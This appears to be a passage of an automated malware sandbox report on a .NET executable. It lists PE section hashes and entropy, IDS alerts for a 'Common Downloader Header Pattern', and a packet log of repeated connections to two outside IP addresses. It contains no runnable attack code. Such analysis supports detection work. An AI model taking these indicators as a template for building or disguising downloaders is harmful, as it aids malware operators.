                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x9792c0x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x980000x1b10.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x97a000x3608
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x9a0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x959840x95a00d04dafbfa5d989b67d1444b8fcb32d27False0.9068569862155389data7.899161344113745IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0x980000x1b100x1c00356b237d36446d0b71e758328f71fcb5False0.8078962053571429data7.243033681206881IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x9a0000xc0x2000062e84d5133069e439f044e380a5419False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x981000x1439PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9592428047131544
                                              RT_GROUP_ICON0x9954c0x14data1.05
                                              RT_VERSION0x995700x3a0data0.41810344827586204
                                              RT_MANIFEST0x999200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                              DLLImport
                                              mscoree.dll_CorExeMain
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-11-18T18:21:20.928058+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549711132.226.247.7380TCP
                                              2024-11-18T18:21:22.239368+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549711132.226.247.7380TCP
                                              2024-11-18T18:21:23.022502+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549713188.114.96.3443TCP
                                              2024-11-18T18:21:23.958124+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549714132.226.247.7380TCP
                                              2024-11-18T18:21:25.078851+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549715188.114.96.3443TCP
                                              2024-11-18T18:21:29.473739+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549721132.226.247.7380TCP
                                              2024-11-18T18:21:30.399933+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549726188.114.96.3443TCP
                                              2024-11-18T18:21:30.724304+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549721132.226.247.7380TCP
                                              2024-11-18T18:21:31.488065+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549731188.114.96.3443TCP
                                              2024-11-18T18:21:32.219380+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549732188.114.96.3443TCP
                                              2024-11-18T18:21:32.520608+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549733132.226.247.7380TCP
                                              2024-11-18T18:21:33.557836+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549741188.114.96.3443TCP
                                              2024-11-18T18:21:34.520631+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549748132.226.247.7380TCP
                                              2024-11-18T18:21:38.783324+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549773188.114.96.3443TCP
                                              2024-11-18T18:21:42.417169+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549796188.114.96.3443TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 18, 2024 18:21:19.545499086 CET4971180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:19.550698042 CET8049711132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:19.550787926 CET4971180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:19.552418947 CET4971180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:19.557235956 CET8049711132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:20.416034937 CET8049711132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:20.446110010 CET4971180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:20.451087952 CET8049711132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:20.713268042 CET8049711132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:20.791735888 CET49712443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:20.791774035 CET44349712188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:20.792010069 CET49712443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:20.808358908 CET49712443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:20.808383942 CET44349712188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:20.927921057 CET8049711132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:20.928057909 CET4971180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:21.467184067 CET44349712188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:21.467318058 CET49712443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:21.482585907 CET49712443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:21.482598066 CET44349712188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:21.482877970 CET44349712188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:21.557286024 CET49712443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:21.603323936 CET44349712188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:21.729774952 CET44349712188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:21.729859114 CET44349712188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:21.730298042 CET49712443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:21.788186073 CET49712443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:21.931711912 CET4971180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:21.936539888 CET8049711132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:22.190027952 CET8049711132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:22.195349932 CET49713443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:22.195391893 CET44349713188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:22.195658922 CET49713443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:22.196073055 CET49713443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:22.196089983 CET44349713188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:22.239367962 CET4971180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:22.840756893 CET44349713188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:22.843801022 CET49713443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:22.843833923 CET44349713188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:23.022515059 CET44349713188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:23.022579908 CET44349713188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:23.022614002 CET49713443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:23.023155928 CET49713443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:23.028166056 CET4971180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:23.029583931 CET4971480192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:23.033622026 CET8049711132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:23.033699036 CET4971180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:23.034532070 CET8049714132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:23.034621954 CET4971480192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:23.034779072 CET4971480192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:23.039639950 CET8049714132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:23.909157038 CET8049714132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:23.911009073 CET49715443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:23.911055088 CET44349715188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:23.911407948 CET49715443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:23.911950111 CET49715443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:23.911967993 CET44349715188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:23.958123922 CET4971480192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:24.919909954 CET44349715188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:24.921982050 CET49715443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:24.921999931 CET44349715188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:25.078862906 CET44349715188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:25.078923941 CET44349715188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:25.078974962 CET49715443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:25.079560995 CET49715443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:25.084592104 CET4971680192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:25.089636087 CET8049716132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:25.089695930 CET4971680192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:25.089791059 CET4971680192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:25.094636917 CET8049716132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:25.975491047 CET8049716132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:25.977543116 CET49717443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:25.977580070 CET44349717188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:25.977730989 CET49717443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:25.978060961 CET49717443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:25.978072882 CET44349717188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:26.020627975 CET4971680192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:26.695667982 CET44349717188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:26.697628021 CET49717443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:26.697649956 CET44349717188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:26.870004892 CET44349717188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:26.870069027 CET44349717188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:26.870277882 CET49717443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:26.870609045 CET49717443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:26.873759031 CET4971680192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:26.874854088 CET4971880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:26.879744053 CET8049716132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:26.879828930 CET4971680192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:26.880640030 CET8049718132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:26.880724907 CET4971880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:26.880819082 CET4971880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:26.886548996 CET8049718132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:27.791966915 CET8049718132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:27.793292999 CET49719443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:27.793340921 CET44349719188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:27.793401957 CET49719443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:27.793648005 CET49719443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:27.793661118 CET44349719188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:27.833162069 CET4971880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:28.270560980 CET4972180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:28.275566101 CET8049721132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:28.275660992 CET4972180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:28.277118921 CET4972180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:28.281991959 CET8049721132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:28.466228008 CET44349719188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:28.468067884 CET49719443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:28.468087912 CET44349719188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:28.682250977 CET44349719188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:28.682337046 CET44349719188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:28.682533026 CET49719443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:28.683074951 CET49719443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:28.691873074 CET4971880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:28.694185972 CET4972380192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:28.697511911 CET8049718132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:28.697581053 CET4971880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:28.699167013 CET8049723132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:28.699246883 CET4972380192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:28.699466944 CET4972380192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:28.704351902 CET8049723132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:29.156857967 CET8049721132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:29.160865068 CET4972180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:29.165864944 CET8049721132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:29.422700882 CET8049721132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:29.472580910 CET49725443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:29.472618103 CET44349725188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:29.472681999 CET49725443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:29.473738909 CET4972180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:29.477653027 CET49725443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:29.477663994 CET44349725188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:29.555248022 CET8049723132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:29.556740999 CET49726443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:29.556776047 CET44349726188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:29.557622910 CET49726443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:29.557939053 CET49726443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:29.557952881 CET44349726188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:29.598750114 CET4972380192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:30.156235933 CET44349725188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:30.157210112 CET49725443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:30.158301115 CET49725443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:30.158308983 CET44349725188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:30.158590078 CET44349725188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:30.208302975 CET49725443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:30.220602989 CET49725443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:30.227149963 CET44349726188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:30.229074001 CET49726443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:30.229096889 CET44349726188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:30.267327070 CET44349725188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:30.383363008 CET44349725188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:30.383433104 CET44349725188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:30.384303093 CET49725443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:30.388300896 CET49725443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:30.392301083 CET4972180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:30.397296906 CET8049721132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:30.399981022 CET44349726188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:30.400054932 CET44349726188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:30.400111914 CET49726443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:30.400515079 CET49726443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:30.404299974 CET4972380192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:30.404690981 CET4972980192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:30.409821987 CET8049729132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:30.409904957 CET4972980192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:30.410033941 CET8049723132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:30.410052061 CET4972980192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:30.410094976 CET4972380192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:30.415307045 CET8049729132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:30.663184881 CET8049721132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:30.665832996 CET49731443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:30.665869951 CET44349731188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:30.665940046 CET49731443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:30.666434050 CET49731443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:30.666443110 CET44349731188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:30.724303961 CET4972180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:31.299364090 CET8049729132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:31.300730944 CET49732443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:31.300776958 CET44349732188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:31.300976992 CET49732443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:31.301228046 CET49732443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:31.301239014 CET44349732188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:31.311697006 CET44349731188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:31.314138889 CET49731443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:31.314166069 CET44349731188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:31.348747015 CET4972980192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:31.488071918 CET44349731188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:31.488136053 CET44349731188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:31.488218069 CET49731443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:31.492690086 CET49731443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:31.497279882 CET4972180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:31.499336958 CET4973380192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:31.504189968 CET8049721132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:31.504290104 CET4972180192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:31.504626989 CET8049733132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:31.505584955 CET4973380192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:31.505584955 CET4973380192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:31.511950016 CET8049733132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:31.950767040 CET44349732188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:31.959449053 CET49732443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:31.959542036 CET44349732188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:32.219407082 CET44349732188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:32.219475985 CET44349732188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:32.219671965 CET49732443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:32.220033884 CET49732443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:32.223931074 CET4972980192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:32.225169897 CET4973580192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:32.232112885 CET8049735132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:32.232309103 CET4973580192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:32.232359886 CET4973580192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:32.237225056 CET8049735132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:32.256247044 CET8049729132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:32.256330013 CET4972980192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:32.474581957 CET8049733132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:32.478502035 CET49741443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:32.478538036 CET44349741188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:32.478647947 CET49741443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:32.479281902 CET49741443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:32.479295015 CET44349741188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:32.520607948 CET4973380192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:33.369868040 CET8049735132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:33.370282888 CET44349741188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:33.371192932 CET49742443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:33.371228933 CET44349742188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:33.371678114 CET49742443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:33.371964931 CET49742443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:33.371977091 CET44349742188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:33.392932892 CET49741443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:33.392955065 CET44349741188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:33.395868063 CET8049735132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:33.396095991 CET4973580192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:33.557853937 CET44349741188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:33.557934999 CET44349741188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:33.558109999 CET49741443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:33.558351994 CET49741443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:33.561700106 CET4973380192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:33.562697887 CET4974880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:33.566968918 CET8049733132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:33.567107916 CET4973380192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:33.567617893 CET8049748132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:33.567696095 CET4974880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:33.567935944 CET4974880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:33.573061943 CET8049748132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:34.020216942 CET44349742188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:34.030354023 CET49742443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:34.030374050 CET44349742188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:34.212155104 CET44349742188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:34.212213039 CET44349742188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:34.212260962 CET49742443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:34.213078976 CET49742443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:34.471199989 CET8049748132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:34.472553968 CET49754443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:34.472626925 CET44349754188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:34.472708941 CET49754443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:34.472956896 CET49754443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:34.472990990 CET44349754188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:34.520631075 CET4974880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:35.118999958 CET44349754188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:35.128405094 CET49754443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:35.128432989 CET44349754188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:35.290707111 CET44349754188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:35.290775061 CET44349754188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:35.290904999 CET49754443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:35.291481972 CET49754443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:35.296385050 CET4975780192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:35.301819086 CET8049757132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:35.301935911 CET4975780192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:35.302304983 CET4975780192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:35.307286024 CET8049757132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:36.199075937 CET8049757132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:36.200470924 CET49762443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:36.200520039 CET44349762188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:36.200997114 CET49762443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:36.200997114 CET49762443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:36.201030016 CET44349762188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:36.239375114 CET4975780192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:36.856218100 CET44349762188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:36.858289003 CET49762443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:36.858325005 CET44349762188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:37.020653009 CET44349762188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:37.020715952 CET44349762188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:37.020796061 CET49762443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:37.030206919 CET49762443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:37.049647093 CET4975780192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:37.055305958 CET8049757132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:37.055479050 CET4975780192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:37.056179047 CET4976780192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:37.061031103 CET8049767132.226.247.73192.168.2.5
